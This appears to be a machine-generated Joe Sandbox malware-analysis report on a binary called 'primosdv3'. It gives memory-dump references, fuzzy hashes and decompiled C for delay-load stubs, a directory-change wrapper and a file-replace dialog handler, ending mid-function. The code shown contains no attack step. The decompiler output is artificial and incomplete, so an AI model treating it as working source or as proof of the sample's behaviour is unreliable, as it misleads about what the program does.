Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d82f44f8b9ecbdafaebfd4b82e6fac3e39b2cf325ddbef64b4e4ec6b55a2b60f
Instruction ID: 6f7d1bd0098ebe20b275e93ab869be723f7cd3ed87eeafd98d528a97047263a3
Opcode Fuzzy Hash: d82f44f8b9ecbdafaebfd4b82e6fac3e39b2cf325ddbef64b4e4ec6b55a2b60f
Instruction Fuzzy Hash: 05A001E72A9152BC3608A2566D4AD3B022DC5C9B65330D9AEF82A954D1A88018456873

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2e25a3392c69e8bc61653eaa6b89af1c02ce1f45747d5386fe00dc294eb9ffc8
Instruction ID: 6f7d1bd0098ebe20b275e93ab869be723f7cd3ed87eeafd98d528a97047263a3
Opcode Fuzzy Hash: 2e25a3392c69e8bc61653eaa6b89af1c02ce1f45747d5386fe00dc294eb9ffc8
Instruction Fuzzy Hash: 05A001E72A9152BC3608A2566D4AD3B022DC5C9B65330D9AEF82A954D1A88018456873

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E580

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5730df007c2c183f02b6f777bf6cb0c001c83241399e38c7a7374778e5858b67
Instruction ID: 6a0bc248b79f5543340d1872b4ce8cf3aca45d4e6fbbb564b8d88f22e1ec1475
Opcode Fuzzy Hash: 5730df007c2c183f02b6f777bf6cb0c001c83241399e38c7a7374778e5858b67
Instruction Fuzzy Hash: 6EA011C32A8002BC3208A2A22C8AC3B022CC0C8B28330C8AEF82A880C0A88008002832

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E580

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dff0a8db4d761a36e3b2254c55dd66b282db0c3780a11986cdb8073d0350dae8
Instruction ID: 6a0bc248b79f5543340d1872b4ce8cf3aca45d4e6fbbb564b8d88f22e1ec1475
Opcode Fuzzy Hash: dff0a8db4d761a36e3b2254c55dd66b282db0c3780a11986cdb8073d0350dae8
Instruction Fuzzy Hash: 6EA011C32A8002BC3208A2A22C8AC3B022CC0C8B28330C8AEF82A880C0A88008002832

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bdf4fae72d6a19e983441ed465561ddad0a4f24b474a0def6b870547b717e89f
Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
Opcode Fuzzy Hash: bdf4fae72d6a19e983441ed465561ddad0a4f24b474a0def6b870547b717e89f
Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7639a3b67a2e14e829b28192ef36698efe67f06a497fcdfc40490603dfaee536
Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
Opcode Fuzzy Hash: 7639a3b67a2e14e829b28192ef36698efe67f06a497fcdfc40490603dfaee536
Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fc0136a6d928e5b14385698ca10ae6351b0d92234f53533cf4c15626a416c4e1
Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
Opcode Fuzzy Hash: fc0136a6d928e5b14385698ca10ae6351b0d92234f53533cf4c15626a416c4e1
Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5de1b3298815a6a7d14f0e11f865600e99cb8865ab4272edea467d653a4fb027
Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
Opcode Fuzzy Hash: 5de1b3298815a6a7d14f0e11f865600e99cb8865ab4272edea467d653a4fb027
Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E580

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b2e295e0e301c2246a40231e903fcb10857076a2147557a6b92f53ca84156637
Instruction ID: 108662e6467020d9af87aee12c66db5b6581d8ee97618cdbcf30763f7683cc75
Opcode Fuzzy Hash: b2e295e0e301c2246a40231e903fcb10857076a2147557a6b92f53ca84156637
Instruction Fuzzy Hash: 44A011C32A80003C3208A2B22C8AC3B022CC0C8B2A330C2AEF828880C0A88008002832

Uniqueness

Uniqueness Score: -1.00%

Function 00C7AC04 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7AC04(WCHAR* _a4) {
				signed int _t4;

				_t4 = SetCurrentDirectoryW(_a4); // executed
				return _t4 & 0xffffff00 | _t4 != 0x00000000;
			}

0x00c7ac08
0x00c7ac13

APIs

SetCurrentDirectoryW.KERNELBASE(?,00C7AE72,C:\Users\user\Desktop,00000000,00CA946A,00000006), ref: 00C7AC08

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: e1437e9e5e7e80a3f1a55e4363811962d5d98aa410d7c8376397bc1587e4805f
Instruction ID: c01a2527fb2cca284233590411a87584126855c195443a858cd95a80e6c12d7d
Opcode Fuzzy Hash: e1437e9e5e7e80a3f1a55e4363811962d5d98aa410d7c8376397bc1587e4805f
Instruction Fuzzy Hash: 8BA011302002808B82000B328F0AB0EBAAAAFA2B00F00C02AA00088030CB30C820AA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C7C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286
timewindowfileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00C7C220(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t74;
				void* _t137;
				long _t138;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				signed short _t148;
				void* _t149;
				void* _t150;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t158;
				intOrPtr _t159;
				void* _t160;
				int _t162;
				int _t165;
				void* _t168;
				void* _t170;

				_t156 = __edx;
				E00C7EC50(0x1a50);
				_t148 = _a6748;
				_t159 = _a6744;
				_t158 = _a6740;
				if(E00C61316(__edx, _t158, _t159, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t160 = _t159 - 0x110;
					if(_t160 == 0) {
						SetFocus(GetDlgItem(_t158, 0x6c));
						E00C70602( &_a2640, _a6752, 0x800);
						E00C6C36E( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t158, 0x65,  &_a2616);
						 *0xcc3074( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t158, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t162 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00C64092( &_a900, 0x200, L"%s %s %s", E00C6E617(0x99));
							_t170 = _t168 + 0x18;
							SetDlgItemTextW(_t158, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t150 = 0x200;
							} else {
								asm("adc eax, ebp");
								E00C7AF0F(0 + _a344, _a340,  &_a212, 0x32);
								_push(E00C6E617(0x98));
								_t150 = 0x200;
								E00C64092( &_a884, 0x200, L"%s %s",  &_a192);
								_t170 = _t170 + 0x14;
								SetDlgItemTextW(_t158, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t158, 0x67, 0x170, _a1928, 0);
							_t152 =  *0xca8464; // 0x0
							E00C7138A(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t162,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00C64092( &_a896, _t150, L"%s %s %s", E00C6E617(0x99));
							_t168 = _t170 + 0x18;
							SetDlgItemTextW(_t158, 0x6b,  &_a896);
							_t153 =  *0xcbec8c;
							_t157 =  *0xcbec88;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E00C7AF0F(_t157, _t153,  &_a212, 0x32);
								_push(E00C6E617(0x98));
								E00C64092( &_a884, _t150, L"%s %s",  &_a192);
								_t168 = _t168 + 0x14;
								SetDlgItemTextW(_t158, 0x69,  &_a884);
							}
						}
						L27:
						_t74 = 0;
						L28:
						return _t74;
					}
					if(_t160 != 1) {
						goto L27;
					}
					_t165 = 2;
					_t137 = (_t148 & 0x0000ffff) - _t165;
					if(_t137 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t165);
						L13:
						_t138 = SendDlgItemMessageW(_t158, 0x66, 0x171, 0, 0);
						if(_t138 != 0) {
							 *0xcc30d0(_t138);
						}
						EndDialog(_t158, _t165);
						goto L1;
					}
					_t142 = _t137 - 0x6a;
					if(_t142 == 0) {
						_t165 = 0;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_t165 = 1;
						goto L13;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						_push(4);
						goto L12;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						goto L13;
					}
					_t146 = _t145 - 1;
					if(_t146 == 0) {
						_push(3);
						goto L12;
					}
					if(_t146 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t74 = 1;
				goto L28;
			}

0x00c7c220
0x00c7c225
0x00c7c22b
0x00c7c234
0x00c7c23e
0x00c7c25d
0x00c7c267
0x00c7c26d
0x00c7c2e7
0x00c7c302
0x00c7c311
0x00c7c321
0x00c7c342
0x00c7c358
0x00c7c374
0x00c7c379
0x00c7c38c
0x00c7c39c
0x00c7c3a2
0x00c7c3a8
0x00c7c3a9
0x00c7c3ae
0x00c7c3b1
0x00c7c3b8
0x00c7c3d4
0x00c7c3de
0x00c7c3e6
0x00c7c404
0x00c7c409
0x00c7c417
0x00c7c41e
0x00c7c42c
0x00c7c492
0x00c7c42e
0x00c7c448
0x00c7c44c
0x00c7c45b
0x00c7c463
0x00c7c477
0x00c7c47c
0x00c7c48a
0x00c7c48a
0x00c7c4a7
0x00c7c4ad
0x00c7c4b8
0x00c7c4c7
0x00c7c4d7
0x00c7c4f1
0x00c7c509
0x00c7c513
0x00c7c51b
0x00c7c535
0x00c7c53a
0x00c7c548
0x00c7c556
0x00c7c55c
0x00c7c562
0x00c7c576
0x00c7c585
0x00c7c59c
0x00c7c5a1
0x00c7c5af
0x00c7c5af
0x00c7c562
0x00c7c5b5
0x00c7c5b5
0x00c7c5bb
0x00c7c5c1
0x00c7c5c1
0x00c7c272
0x00000000
0x00000000
0x00c7c27d
0x00c7c27e
0x00c7c280
0x00c7c2a4
0x00c7c2a4
0x00c7c2a6
0x00c7c2a6
0x00c7c2a7
0x00c7c2b1
0x00c7c2b9
0x00c7c2bc
0x00c7c2bc
0x00c7c2c4
0x00000000
0x00c7c2c4
0x00c7c282
0x00c7c285
0x00c7c2d9
0x00000000
0x00c7c2d9
0x00c7c287
0x00c7c28a
0x00c7c2d6
0x00000000
0x00c7c2d6
0x00c7c28c
0x00c7c28f
0x00c7c2d0
0x00000000
0x00c7c2d0
0x00c7c291
0x00c7c294
0x00000000
0x00000000
0x00c7c296
0x00c7c299
0x00c7c2cc
0x00000000
0x00c7c2cc
0x00c7c29e
0x00000000
0x00000000
0x00000000
0x00c7c29e
0x00c7c25f
0x00c7c261
0x00000000

APIs

Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00C7C2B1
EndDialog.USER32(?,00000006), ref: 00C7C2C4
GetDlgItem.USER32(?,0000006C), ref: 00C7C2E0
SetFocus.USER32(00000000), ref: 00C7C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00C7C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00C7C358
FindFirstFileW.KERNEL32(?,?), ref: 00C7C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C7C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C7C3D4
_swprintf.LIBCMT ref: 00C7C404

Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00C7C417
FindClose.KERNEL32(00000000), ref: 00C7C41E
_swprintf.LIBCMT ref: 00C7C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00C7C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00C7C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00C7C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C7C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C7C509
_swprintf.LIBCMT ref: 00C7C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00C7C548
_swprintf.LIBCMT ref: 00C7C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00C7C5AF

Part of subcall function 00C7AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C7AF35
Part of subcall function 00C7AF0F: GetNumberFormatW.KERNEL32 ref: 00C7AF84

Strings

REPLACEFILEDLG, xrefs: 00C7C247
%s %s %s, xrefs: 00C7C3F2, 00C7C527
%s %s, xrefs: 00C7C469, 00C7C58E

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: b16954fe236a1f9e52c7a26e3c7165d724dda1504400a0cfb6edb2a197eb40db
Instruction ID: d202fb3bf164abfba724189801d1268b42fc509aede4a28cab56fe65882d3b9e
Opcode Fuzzy Hash: b16954fe236a1f9e52c7a26e3c7165d724dda1504400a0cfb6edb2a197eb40db
Instruction Fuzzy Hash: 8E918272248389BFD3219BA0DC89FFF77ACEB49B00F048819F649D6091D775EA049762

Uniqueness

Uniqueness Score: -1.00%

Function 00C66FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00C66FAA(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t98;
				void* _t109;
				signed int _t112;
				intOrPtr _t117;
				signed int _t134;
				long _t154;
				void* _t182;
				void* _t186;
				void* _t190;
				void* _t194;
				short _t195;
				void* _t199;
				WCHAR* _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
